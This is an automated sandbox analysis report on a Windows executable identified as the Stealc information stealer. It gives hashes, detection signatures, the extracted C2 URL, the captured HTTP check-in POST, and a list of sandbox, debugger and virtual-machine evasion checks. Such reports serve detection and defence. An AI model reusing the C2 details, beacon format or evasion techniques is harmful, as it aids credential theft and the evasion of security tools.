Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1521035
MD5:e904093ef887cb372b3fe7ab75e6c6c7
SHA1:aece57bd3cbb0bc1818fe026100f30783a6e3f55
SHA256:b99711aa1ee5a0ca9cfcc53dff0ffcab9f2800afad74a0633b1488fe2afa47b7
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E904093EF887CB372B3FE7AB75E6C6C7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000003.1340711226.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7324JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7324JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.file.exe.920000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-28T03:23:04.686587+020020442431Malware Command and Control Activity Detected192.168.2.949706185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 1.2.file.exe.920000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/Virustotal: Detection: 17%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php_Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37Virustotal: Detection: 17%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpVirustotal: Detection: 18%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,1_2_0092C820
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00929AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00929AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00927240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00927240
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00929B60 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00929B60
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00938EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00938EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_009338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00934910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00934910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0092DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0092E430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0092ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00934570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00934570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0092F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00933EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00933EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_009216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0092DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0092BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0092BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49706 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 42 31 36 36 33 42 38 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"96B1663B80381806970752------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"save------JKEGHDGHCGHDHJKFBFBK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00924880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00924880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 42 31 36 36 33 42 38 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"96B1663B80381806970752------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"save------JKEGHDGHCGHDHJKFBFBK--
                Source: file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000001.00000002.1386340367.0000000001085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000001.00000002.1386340367.0000000001082000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.0000000001085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BDB0571_2_00BDB057
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BB41B91_2_00BB41B9
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D0A9961_2_00D0A996
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C211411_2_00C21141
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B959261_2_00B95926
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CCB2E31_2_00CCB2E3
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CE0AA81_2_00CE0AA8
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CEE3E61_2_00CEE3E6
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CE5B7A1_2_00CE5B7A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C134EB1_2_00C134EB
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CEAD771_2_00CEAD77
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CE36EA1_2_00CE36EA
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CECEE61_2_00CECEE6
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CE76871_2_00CE7687
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BF46651_2_00BF4665
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CD57D01_2_00CD57D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CE977A1_2_00CE977A
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009245C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: bctajgqz ZLIB complexity 0.9949198632990003
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00938680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00938680
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00933720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00933720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\3UP3VPLO.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1846784 > 1048576
                Source: file.exeStatic PE information: Raw size of bctajgqz is bigger than: 0x100000 < 0x19ca00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.920000.0.unpack :EW;.rsrc :W;.idata :W; :EW;bctajgqz:EW;phttshfa:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;bctajgqz:EW;phttshfa:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00939860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00939860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c7339 should be: 0x1c56bb
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: bctajgqz
                Source: file.exeStatic PE information: section name: phttshfa
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DC88CC push 2178BFE9h; mov dword ptr [esp], edi1_2_00DC8A6C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DC88CC push edi; mov dword ptr [esp], edx1_2_00DC8AED
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C648D1 push 468A2759h; mov dword ptr [esp], ecx1_2_00C648F2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C648D1 push 0CED83D4h; mov dword ptr [esp], ebp1_2_00C64912
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C648D1 push edx; mov dword ptr [esp], ecx1_2_00C6491C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DA50E9 push eax; mov dword ptr [esp], edx1_2_00DA510B
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DA50E9 push edx; mov dword ptr [esp], ebp1_2_00DA5154
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D7E88F push edi; mov dword ptr [esp], ebx1_2_00D7E8EE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DB105F push edx; mov dword ptr [esp], 00000004h1_2_00DB117D
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D1605E push edx; mov dword ptr [esp], edi1_2_00D160C6
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D1D048 push esi; mov dword ptr [esp], 7FE3E912h1_2_00D1D093
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D1D048 push 1F565B09h; mov dword ptr [esp], eax1_2_00D1D115
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D1D048 push 5C614DF8h; mov dword ptr [esp], ebx1_2_00D1D124
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FB605A push edx; mov dword ptr [esp], 76E366C3h1_2_00FB60D6
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FB605A push 3ECF65EBh; mov dword ptr [esp], eax1_2_00FB60F3
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FB605A push 6EF77CADh; mov dword ptr [esp], edi1_2_00FB610C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FB605A push esi; mov dword ptr [esp], ecx1_2_00FB616A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0093B035 push ecx; ret 1_2_0093B048
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DE380F push 45569AF4h; mov dword ptr [esp], ecx1_2_00DE38DF
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DE380F push ebx; mov dword ptr [esp], 01F0DB0Bh1_2_00DE38EB
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D58835 push edi; mov dword ptr [esp], ebx1_2_00D5888B
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D9783A push 6C65225Ah; mov dword ptr [esp], ebx1_2_00D978AC
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D9783A push 0F352231h; mov dword ptr [esp], edi1_2_00D978C9
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D9783A push 4D6A1F4Dh; mov dword ptr [esp], ebx1_2_00D9797E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BDB057 push 0A6BBC58h; mov dword ptr [esp], esi1_2_00BDB0AE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DC8832 push edi; mov dword ptr [esp], esp1_2_00DC8866
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D0C021 push ebx; mov dword ptr [esp], ecx1_2_00D0C060
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BB41B9 push 447EB9FCh; mov dword ptr [esp], ebx1_2_00BB41D1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BB41B9 push ebp; mov dword ptr [esp], edi1_2_00BB41DD
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BB41B9 push 334FD091h; mov dword ptr [esp], esi1_2_00BB42AA
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C679D3 push eax; mov dword ptr [esp], 7FFE24CEh1_2_00C67A10
                Source: file.exeStatic PE information: section name: bctajgqz entropy: 7.953531786807203

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00939860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00939860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-13244
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF247F second address: CF248A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF248A second address: CF24B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F699913D300h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F699913D306h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF24B9 second address: CF24C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F6999135DE6h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF24C6 second address: CF24DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D303h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2762 second address: CF2766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2766 second address: CF2776 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F699913D2F6h 0x00000008 jo 00007F699913D2F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2776 second address: CF2780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6999135DE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF290E second address: CF2918 instructions: 0x00000000 rdtsc 0x00000002 je 00007F699913D2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2AA2 second address: CF2AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6999135DF7h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F6999135DEDh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6999135DEAh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2C53 second address: CF2C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F699913D2F6h 0x0000000d rdtsc
